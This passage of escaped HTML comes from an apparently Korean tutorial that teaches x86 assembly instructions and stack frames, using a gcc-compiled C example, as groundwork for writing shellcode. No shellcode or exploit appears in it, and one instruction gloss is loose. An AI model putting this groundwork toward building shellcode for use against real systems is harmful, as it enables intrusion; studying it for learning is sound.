style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>decl %eax<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" eax\uc5d0 1\uc744 \uac10\uc18c. 
\"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>eax\uc5d0 1\uc744 \uac10\uc18c.<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" eax-- \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>eax--<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\" lea \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>lea<SPAN style=\"mso-spacerun: yes\">&nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>leal 0x8(%esi),%eax<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>eax\uc5d0<SPAN style=\"mso-spacerun: yes\">&nbsp; <\/SPAN>esi+8\uc8fc\uc18c\ub97c \ub123\uc5b4\ub77c.<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" eax = esi + 8 \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>eax = esi + 8<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 
13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\" xor \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>xor<SPAN style=\"mso-spacerun: yes\">&nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" xor %eax, %eax \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>xor %eax, %eax<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" \ub458\uc744 \ube44\uad50\ud574\uc11c \uac19\uc73c\uba74 0 \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>\ub458\uc744 \ube44\uad50\ud574\uc11c \uac19\uc73c\uba74 0<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" if(a==b) b=0 \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>if(a==b) b=0<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\" jmp \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>jmp<SPAN style=\"mso-spacerun: yes\">&nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: 
windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" jmp string \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>jmp string<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" 0x1f\uc704\uce58\ub85c jump\ud558\ub77c. \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>0x1f\uc704\uce58\ub85c jump\ud558\ub77c.<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" goto string \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>goto string<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\" call \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>call<SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" call star \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>call star<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: 
transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" \uc11c\ube0c\ub8e8\ud2f4\uc744 call \ud568. \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>\uc11c\ube0c\ub8e8\ud2f4\uc744 call \ud568.<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" star() \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>star()<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\" ret \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>ret<SPAN style=\"mso-spacerun: yes\">&nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" ret \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>ret<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" \uc11c\ube0c\ub8e8\ud2f4\uc5d0\uc11c \uc6d0\ub798\ub85c \ubcf5\uadc0 \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>\uc11c\ube0c\ub8e8\ud2f4\uc5d0\uc11c \uc6d0\ub798\ub85c \ubcf5\uadc0<SPAN style=\"mso-spacerun: yes\">&nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; 
BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" return \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>return<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\" int \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>int<SPAN style=\"mso-spacerun: yes\">&nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" int $0x80 \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>int $0x80<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" system call \uc704\ud55c \uc778\ud130\ub7fd\ud2b8 \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>system call \uc704\ud55c \uc778\ud130\ub7fd\ud2b8<SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" - \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>-<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; 
BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\" push \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>push<SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" push %ebp \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>push %ebp<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" ebp\uac12\uc744 stack\uc5d0 \uc800\uc7a5 \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>ebp\uac12\uc744 stack\uc5d0 \uc800\uc7a5<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" - \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>-<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\" pop \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>pop<SPAN style=\"mso-spacerun: yes\">&nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; 
BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" pop %esi \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>pop %esi<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" stack\uc5d0\uc11c \uaebc\ub0b4 esi\uc5d0 \uc800\uc7a5 \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>stack\uc5d0\uc11c \uaebc\ub0b4 esi\uc5d0 \uc800\uc7a5<SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" - \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>-<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD><\/TR><\/TBODY><\/TABLE>\n\n<P><br \/><br \/>\uc774\uc678\uc5d0\ub3c4 \ub9ce\uc740 \uba85\ub839\uc5b4\ub4e4\uc774 \uc788\uc73c\ub098 \uc704\uc758 \uae30\ubcf8\uc801\uc778 \uba85\ub839\uc5b4\ub4e4\ub9cc \ucda9\ubd84\uc774 \uc774\ud574\ud55c\ub2e4\uba74 shellcode\ub97c \ub9cc\ub4dc <br \/>\ub294\ub370 \ud070 \ubb38\uc81c\uac00 \uc5c6\uc744 \uac83\uc774\ub2e4.&nbsp; <br \/><br \/>&lt;\uc5b4\uc148\ube14\ub9ac \ud504\ub85c\uadf8\ub7a8 \uc774\ud574&gt; <br \/>\uc9c0\uae08\uae4c\uc9c0 \uba87\uac1c\uc758 \ub808\uc9c0\uc2a4\ud130\uc758 \uc774\ub984\uacfc \uac04\ub2e8\ud55c \uc5b4\uc0d8\ube14\ub9ac \uba85\ub839\uc5b4\uc5d0 \ub300\ud558\uc5ec \uc54c\uc544\ubcf4\uc558\ub2e4. 
\uc774\uc81c Linux\uc5d0\uc11c&nbsp; <br \/>\uc0ac\uc6a9\ub418\ub294 \uc5b4\uc148\ube14\ub9ac\uc758 \uad6c\uc870\ub97c \uc54c\uc544\ubcf4\uae30 \uc704\ud558\uc5ec \uac04\ub2e8\ud55c C\uc5b8\uc5b4 \ud504\ub85c\uadf8\ub7a8\uc744 \ub9cc\ub4e4\uc5b4\uc11c \uc5b4\uc148\ube14\ub9ac\uc5b8\uc5b4\ub85c&nbsp; <br \/>\ucef4\ud37c\uc77c \ud574\ubcf4\uc790. \uc6b0\ub9ac\ub294 \ud504\ub85c\uadf8\ub7a8 \ub0b4\uc5d0\uc11c \uc2a4\ud14d\uc5d0 data\uac00 \uc5b4\ub5bb\uac8c \uc313\uc774\uace0 \ucc98\ub9ac\ub418\ub294\uc9c0 esp\uc640 ebp\uc758&nbsp; <br \/>\ubcc0\ud654\ub97c \ud1b5\ud558\uc5ec \uc54c\uc544 \ubcfc\ub824\uace0 \ud55c\ub2e4. <br \/><br \/>[willy@Null2Root]$ cat test11.c <br \/>main() <br \/>{ <br \/>&nbsp; int a=1; <br \/>&nbsp; printf(\" a is %d \\n\",a); <br \/>} <br \/><br \/>a\ub97c \ubcc0\uc218\ub85c \uc815\uc758\ud55c\ub4a4 a\uc5d0 1\uc744 \ub123\uace0 \ucd9c\ub825\ud558\ub77c\ub294 \uac04\ub2e8\ud55c \ud504\ub85c\uc774\ub2e4. <br \/><br \/>[willy@Null2Root]$ gcc test11.c -S -o test11.s -mpreferred-stack-boundary=2 <br \/><br \/>\uc5ec\uae30\uc11c -mpreferred-stack-boundary=2 \uc635\uc158\uc744 \uc0ac\uc6a9\ud55c \uc774\uc720\ub294 gcc 2.95\uc774\uc0c1\uc758 \ubc84\uc804\uc5d0\uc11c stack\uc758 \uad6c\uc870\uac00 <br \/>\uc77c\ubd80 \ubcc0\uacbd\ub418\uc5b4 \uc608\uc804\uc758 stack\uad6c\uc870\ub97c \uc0ac\uc6a9\ud558\uae30 \uc704\ud574\uc11c \ucd94\uac00\ud558\uc600\uc73c\uba70, -S \uc635\uc158\uc740 \uc5b4\uc148\ube14\ub9ac\ub85c \ucef4\ud37c\uc77c\ud558\ub294 <br \/>\uc635\uc158\uc774\ub2e4. 
<br \/><br \/>[willy@Null2Root]$ cat test11.s <br \/>&nbsp; &nbsp; &nbsp; &nbsp; .file &nbsp; \"test1.c\" <br \/>&nbsp; &nbsp; &nbsp; &nbsp; .version &nbsp; &nbsp; &nbsp;&nbsp; \"01.01\" <br \/>gcc2_compiled.: <br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; .section &nbsp; &nbsp; &nbsp;&nbsp; .rodata <br \/>.LC0: <br \/>&nbsp; &nbsp; &nbsp; &nbsp; .string \" a is %d \\n\" <br \/>.text <br \/>&nbsp; &nbsp; &nbsp; &nbsp; .align 4 <br \/>.globl main <br \/>&nbsp; &nbsp; &nbsp; &nbsp; .type &nbsp;&nbsp; main,@function <br \/>main: <br \/>&nbsp; &nbsp; &nbsp; &nbsp; pushl &nbsp; %ebp <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; %esp, %ebp <br \/>&nbsp; &nbsp; &nbsp; &nbsp; subl &nbsp;&nbsp; $4, %esp <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $1, -4(%ebp) <br \/>&nbsp; &nbsp; &nbsp; &nbsp; pushl &nbsp; -4(%ebp) <br \/>&nbsp; &nbsp; &nbsp; &nbsp; pushl &nbsp; $.LC0 <br \/>&nbsp; &nbsp; &nbsp; &nbsp; call &nbsp;&nbsp; printf <br \/>&nbsp; &nbsp; &nbsp; &nbsp; addl &nbsp;&nbsp; $8, %esp <br \/>&nbsp; &nbsp; &nbsp; &nbsp; leave <br \/>&nbsp; &nbsp; &nbsp; &nbsp; ret <br \/>.Lfe1: <br \/>&nbsp; &nbsp; &nbsp; &nbsp; .size &nbsp;&nbsp; main,.Lfe1-main <br \/>&nbsp; &nbsp; &nbsp; &nbsp; .ident&nbsp; \"GCC: (GNU) 2.96 20000731 (Red Hat Linux 7.0)\" <br \/>&nbsp;&nbsp; <br \/>\uc774\uc640\uac19\uc774 \uc870\uae08 \ubcf5\uc7a1\ud55c \uad6c\uc870\ub85c \ub418\uc5c8\uc788\ub2e4. \uc5ec\uae30\uc11c \uc9c1\uc811\uc801\uc73c\ub85c \ud504\ub85c\uadf8\ub7a8\uc2e4\ud589\uacfc \uad00\uacc4\uac00 \uc5c6\ub294 \ubd80\ubd84\ub4e4\uc744&nbsp; <br \/>\uc81c\uac70\ud558\uba74 \uc544\ub798\uc640 \uac19\uc740 \uac04\ub2e8\ud55c \uad6c\uc870\ub85c \ub9cc\ub4e4\uc218 \uc788\ub2e4. 
<br \/><br \/>.LC0: <br \/>&nbsp; &nbsp; &nbsp; &nbsp; .string \" a is %d \\n\" <br \/>.globl main <br \/>main: <br \/>&nbsp; &nbsp; &nbsp; &nbsp; pushl &nbsp; %ebp <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; %esp, %ebp <br \/>&nbsp; &nbsp; &nbsp; &nbsp; subl &nbsp;&nbsp; $4, %esp <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $1, -4(%ebp) <br \/>&nbsp; &nbsp; &nbsp; &nbsp; pushl &nbsp; -4(%ebp) <br \/>&nbsp; &nbsp; &nbsp; &nbsp; pushl &nbsp; $.LC0 <br \/>&nbsp; &nbsp; &nbsp; &nbsp; call &nbsp;&nbsp; printf <br \/>&nbsp; &nbsp; &nbsp; &nbsp; addl &nbsp;&nbsp; $8, %esp <br \/>&nbsp; &nbsp; &nbsp; &nbsp; leave <br \/>&nbsp; &nbsp; &nbsp; &nbsp; ret <br \/><br \/>\uc5ec\uae30\uc11c .LC0: \uc640 main:\uc740 \ub77c\ubca8\uc774\uba70 .globl main \ubd80\ubd84\uc740 main\uc744 \ud568\uc218\ub85c \uc815\uc758\ud558\ub294 \ubd80\ubd84\uc774\ub2e4. \uadf8\ub9ac\uace0&nbsp; <br \/>main: \ub0b4\uc5d0\uc11c\uc758 \ud504\ub85c\uadf8\ub7a8\uc744 \ubcf4\uba74 \uc544\ub798\uc640 \uac19\ub2e4.. \ud2b9\ud788 %esp\uc640 %ebp\uc5d0 \ub300\ud558\uc5ec \uc720\uc758\ud574\uc11c \uad00\ucc30\ud574\ubcfc&nbsp; <br \/>\ud544\uc694\uac00 \uc788\ub2e4. \uc5ec\uae30\uc11c \ubcf4\uc5ec\uc8fc\ub294 esp &amp; ebp\uac12\uc740 \uc0c1\ub300\uac12\uc774\ub2e4. 
<br \/><br \/><\/P>\n\n<TABLE style=\"WIDTH: 403pt; BORDER-COLLAPSE: collapse\" border=0 cellSpacing=0 cellPadding=0 width=536 x:str>\n<COLGROUP>\n<COL style=\"WIDTH: 107pt; mso-width-source: userset; mso-width-alt: 4039\" width=142>\n<COL style=\"WIDTH: 40pt; mso-width-source: userset; mso-width-alt: 1507\" span=2 width=53>\n<COL style=\"WIDTH: 216pt; mso-width-source: userset; mso-width-alt: 8192\" width=288>\n<TBODY>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: silver; WIDTH: 107pt; HEIGHT: 13.5pt; BORDER-TOP: windowtext 0.5pt solid; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl25 height=18 width=142><FONT size=2><STRONG>\uba85<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; <\/SPAN>\ub839<\/STRONG><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: silver; WIDTH: 40pt; BORDER-TOP: windowtext 0.5pt solid; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl25 width=53><FONT size=2><STRONG>%esp<\/STRONG><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: silver; WIDTH: 40pt; BORDER-TOP: windowtext 0.5pt solid; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl25 width=53><FONT size=2><STRONG>%ebp<\/STRONG><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: silver; WIDTH: 216pt; BORDER-TOP: windowtext 0.5pt solid; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl25 width=288><STRONG><FONT size=2>\uc124<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; <\/SPAN>\uba85<\/FONT><\/STRONG><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\"pushl %ebp \"><FONT size=2>pushl<SPAN 
style=\"mso-spacerun: yes\">&nbsp;&nbsp; <\/SPAN>%ebp<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>0x00<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" old \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>old<SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" \uae30\uc874 ebp\uac12\uc744 stack\uc5d0 \uc800\uc7a5\ud568. ret\uc2dc \ud658\uc6d0\uc704\ud568 \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>\uae30\uc874 ebp\uac12\uc744 stack\uc5d0 \uc800\uc7a5\ud568. 
